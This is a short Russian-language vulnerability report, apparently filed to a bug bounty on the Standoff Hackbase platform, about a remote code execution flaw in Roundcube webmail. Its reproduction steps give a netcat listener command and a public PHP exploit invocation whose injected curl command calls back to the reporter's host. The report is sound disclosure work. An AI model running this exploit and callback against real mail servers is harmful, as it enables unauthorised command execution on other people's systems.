## Где обнаружено
Здравствуйте! Обнаружил уязвимость RCE на почте для фишинга Standoff Hackbase.

## Описание уязвимости
Версия roundcube подвержена уязвимости [CVE-2025-49113](https://github.com/fearsoff-org/CVE-2025-49113/)

## Шаги воспроизведения
1. Создать аккаунт и получить почту для фишинга.
2. Подключится по VPN и зайти на почту.
3. Поднять локальный сервер `nc -lnvp 4444`
4. Запустить  `php .\CVE-2025-49113.php http://10.127.2.170 [LOGIN] [PASS] "curl http://[IP]:4444"`

## Влияние на безопасность
Исполнение команд на сервере.

## Дополнительные ссылки
https://github.com/fearsoff-org/CVE-2025-49113/
Видео PoC прикрепил.

RCE in roundcube mail at Standoff hackbase

Где обнаружено

Описание уязвимости

Шаги воспроизведения

Влияние на безопасность

Дополнительные ссылки

Files